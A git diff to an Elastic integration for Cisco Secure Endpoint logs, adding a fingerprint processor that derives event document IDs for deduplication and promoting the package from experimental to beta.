index 513c37c1fb5..716beb572e4 100644
--- a/packages/cisco_secure_endpoint/data_stream/event/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/cisco_secure_endpoint/data_stream/event/elasticsearch/ingest_pipeline/default.yml
@@ -12,6 +12,16 @@ processors:
 #########################
 ## ECS General Mapping ##
 #########################
+- fingerprint:
+    fields:
+    - "json.data.timestamp"
+    - "json.data.timestamp_nanoseconds"
+    - "json.data.event_type_id"
+    - "json.data.connector_guid"
+    - "json.data.id"
+    - "json.data.detection_id"
+    target_field: "_id"
+    ignore_missing: true
 - rename:
     field: json.data
     target_field: cisco.secure_endpoint
diff --git a/packages/cisco_secure_endpoint/data_stream/event/manifest.yml b/packages/cisco_secure_endpoint/data_stream/event/manifest.yml
index 65d64108127..c2fa422714b 100644
--- a/packages/cisco_secure_endpoint/data_stream/event/manifest.yml
+++ b/packages/cisco_secure_endpoint/data_stream/event/manifest.yml
@@ -1,5 +1,5 @@
 title: Cisco Secure Endpoint logs
-release: experimental
+release: beta
 type: logs
 streams:
   - input: httpjson